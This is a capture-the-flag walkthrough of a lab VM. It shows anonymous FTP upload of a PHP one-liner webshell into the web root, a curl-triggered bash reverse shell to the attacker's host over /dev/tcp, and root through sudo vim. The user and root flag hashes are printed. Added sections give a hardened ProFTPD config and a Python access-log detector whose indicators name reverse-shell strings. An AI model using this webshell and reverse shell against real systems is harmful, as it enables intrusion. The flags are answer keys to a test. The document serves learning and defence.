Difficulty: easy
Kali: 192.168.56.104
Target: 192.168.56.177
┌──(root㉿kali2)-[~/Desktop]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:c6:2d:d8 PCS Systemtechnik GmbH
192.168.56.177 08:00:27:a2:9f:c0 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.043 seconds (125.31 hosts/sec). 3 responded
Port scan
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.177 -sV -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 12:51 CST
Nmap scan report for 192.168.56.177
Host is up (0.00036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:A2:9F:C0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.56.177
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.28 seconds
Two ports are open: 21 and 80.
FTP anonymous login
┌──(root㉿kali2)-[~/Desktop]
└─# ftp 192.168.56.177
Connected to 192.168.56.177.
220 ProFTPD Server (friendly) [::ffff:192.168.56.177]
Name (192.168.56.177:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||62814|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
226 Transfer complete
ftp> ls
229 Entering Extended Passive Mode (|||27311|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
226 Transfer complete
ftp> get index.html
local: index.html remote: index.html
229 Entering Extended Passive Mode (|||54379|)
150 Opening BINARY mode data connection for index.html (10725 bytes)
100% |********************************************************************************************************************************************************************************************| 10725 116.22 MiB/s 00:00 ETA
226 Transfer complete
10725 bytes received in 00:00 (949.73 KiB/s)
I opened it and it is the Apache2 default page; the web site shows exactly the same page, which means the FTP directory is the HTML web root, so it can be replaced with a PHP reverse-shell file. I like uploading a one-liner webshell.
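Added example, not the machine's real configuration (the writeup never shows /etc/proftpd/proftpd.conf): a ProFTPD anonymous block reconstructed from the behaviour observed here, with the writable web-root layout beside a hardened one. The paths and directive values are assumptions.

```apache
# Weak layout, reconstructed from what was observed above: the anonymous
# root is the Apache DocumentRoot and writes are not denied, so an
# anonymous client can drop aa.php next to index.html.
#
# <Anonymous /var/www/html>
#   User               ftp
#   Group              nogroup
#   UserAlias          anonymous ftp
#   RequireValidShell  off
#   <Limit WRITE>
#     AllowAll
#   </Limit>
# </Anonymous>

# Hardened: anonymous users get a dedicated tree outside the web root
# (path assumed), and every write command (STOR, MKD, DELE, RNFR, ...)
# is refused regardless of the filesystem permissions underneath.
<Anonymous /srv/ftp/pub>
  User               ftp
  Group              nogroup
  UserAlias          anonymous ftp
  RequireValidShell  off
  MaxClients         10
  <Limit WRITE>
    DenyAll
  </Limit>
</Anonymous>
```

Even with DenyAll in place, the directory should be owned by root and not writable by the ftp user, so a second misconfiguration elsewhere cannot reopen the upload path.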
getshell
┌──(root㉿kali2)-[~/Desktop]
└─# cat aa.php
<?=`$_GET[1]`;
Upload it to the machine with put
ftp> put aa.php
local: aa.php remote: aa.php
229 Entering Extended Passive Mode (|||2199|)
150 Opening BINARY mode data connection for aa.php
100% |**********************************************************************************************************************************************************************************************| 15 209.26 KiB/s 00:00 ETA
226 Transfer complete
15 bytes sent in 00:00 (21.41 KiB/s)
┌──(root㉿kali2)-[~/Desktop]
└─# curl http://192.168.56.177/aa.php?1=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261%27
┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.177] 54136
bash: cannot set terminal process group (441): Inappropriate ioctl for device
bash: no job control in this shell
www-data@friendly:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
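Added example, not from the original writeup: the request used above lands in Apache's access log with its payload URL-encoded. This Python script (constructed log lines, Apache combined format assumed) decodes every query value and flags the entries a defender would want to alert on.

```python
# Added example (not part of the original writeup): flag Apache access-log
# entries whose query string decodes to a shell command, the trace that the
# curl request above leaves in the access log. All log lines are constructed.
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Substrings that mark a shell payload rather than ordinary parameter data.
# Kept narrow on purpose: a bare "|" or ";" would flag too much normal traffic.
SHELL_INDICATORS = (
    "/dev/tcp/", "bash -i", "bash -c", "sh -c",  # reverse/interactive shells
    "0>&1", "`", "$(", "&&", "||",               # fd wiring, substitution, chaining
)

# Apache "combined" format: client ident user [timestamp] "METHOD PATH PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

def decode_query_values(request_path):
    """Return every query-parameter value of a request path, fully URL-decoded.
    parse_qsl decodes once; the extra unquote_plus catches double-encoded payloads."""
    query = urlsplit(request_path).query
    return [unquote_plus(v) for _, v in parse_qsl(query, keep_blank_values=True)]

def suspicious_requests(log_lines):
    """Return (client_ip, request_path, indicator) for each line whose decoded
    query contains a shell indicator; lines that do not parse are skipped."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in decode_query_values(m.group("path")):
            found = next((ind for ind in SHELL_INDICATORS if ind in value), None)
            if found:
                hits.append((m.group("ip"), m.group("path"), found))
                break
    return hits

SAMPLE_LOG = [  # constructed entries; the first mirrors the request made above
    '192.168.56.104 - - [27/May/2024:12:55:01 +0800] "GET /aa.php?1=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261%27 HTTP/1.1" 200 0 "-" "curl/8.5.0"',
    '192.168.56.1 - - [27/May/2024:12:55:07 +0800] "GET /index.html HTTP/1.1" 200 10725 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [27/May/2024:12:55:09 +0800] "GET /search.php?q=friendly+ctf HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, indicator in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent {indicator!r} in {path}")
```

A new .php file appearing in the web root via the FTP data connection is the earlier signal; this check catches the moment the file is actually used.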
Privilege escalation to root
www-data@friendly:/home/RiJaba1$ ls
CTF Private YouTube user.txt
www-data@friendly:/home/RiJaba1$ cat user.txt
b8cff8c9008e1c98a1f2937b4475acd6
www-data@friendly:/home/RiJaba1$
Got the user flag in RiJaba's home directory, but I still don't have RiJaba's privileges.
Check sudo
www-data@friendly:/home/RiJaba1$ sudo -l
Matching Defaults entries for www-data on friendly:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on friendly:
(ALL : ALL) NOPASSWD: /usr/bin/vim
Well then, straight to vim privilege escalation: enter !bash on the bottom command line.
~
~
~
~
~ VIM - Vi IMproved
~
~ version 8.2.2434
~ by Bram Moolenaar et al.
~ Modified by team+vim@tracker.debian.org
~ Vim is open source and freely distributable
~
~ Become a registered Vim user!
~ type :help register<Enter> for information
~
~ type :q<Enter> to exit
~ type :help<Enter> or <F1> for on-line help
~ type :help version8<Enter> for version info
~
~
~
~
~
:!bash
root@friendly:/home/RiJaba1# id
uid=0(root) gid=0(root) groups=0(root)
Got root.
root@friendly:~# ls -al
total 32
drwx------ 3 root root 4096 May 27 01:06 .
drwxr-xr-x 18 root root 4096 Mar 11 2023 ..
lrwxrwxrwx 1 root root 9 Feb 23 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwxr-xr-x 3 root root 4096 Feb 21 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw------- 1 root root 839 May 27 01:06 .viminfo
-r-xr-xr-x 1 root root 509 Mar 11 2023 interfaces.sh
-r-------- 1 root root 24 Mar 11 2023 root.txt
root@friendly:~# cat ro*
Not yet! Find root.txt.
root.txt says it is not finished yet and tells us to find root.txt, so just run find.
root@friendly:~# find / -name root.txt 2>/dev/null
/var/log/apache2/root.txt
/root/root.txt
root@friendly:~# cat /var/log/apache2/root.txt
66b5c58f3e83aff307441714d3e28d2f
It really is a friendly box: taken down within ten minutes, before I even finished eating. I'll come back tonight to do part 2.